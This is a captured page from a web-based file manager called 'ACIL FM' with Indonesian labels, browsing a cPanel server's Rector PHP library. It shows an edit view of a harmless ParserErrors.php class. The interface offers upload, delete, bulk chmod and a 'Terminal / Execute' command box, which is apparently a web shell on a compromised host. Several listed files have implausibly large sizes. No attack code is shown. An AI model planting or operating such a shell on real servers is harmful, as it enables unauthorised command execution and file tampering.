ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/rector/rector/src/PhpParser/Parser
/
opt
cpanel
ea-wappspector
vendor
rector
rector
src
PhpParser
Parser
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
InlineCodeParser.php
5.41 MB
chmod
View
DL
Edit
Rename
Delete
ParserErrors.php
709 B
chmod
View
DL
Edit
Rename
Delete
RectorParser.php
1.13 MB
chmod
View
DL
Edit
Rename
Delete
SimplePhpParser.php
2.6 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/rector/rector/src/PhpParser/Parser/ParserErrors.php
<?php declare (strict_types=1); namespace Rector\PhpParser\Parser; use PHPStan\Parser\ParserErrorsException; final class ParserErrors { /** * @readonly * @var string */ private $message; /** * @readonly * @var int */ private $line; public function __construct(ParserErrorsException $parserErrorsException) { $this->message = $parserErrorsException->getMessage(); $this->line = $parserErrorsException->getAttributes()['startLine'] ?? $parserErrorsException->getLine(); } public function getMessage() : string { return $this->message; } public function getLine() : int { return $this->line; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply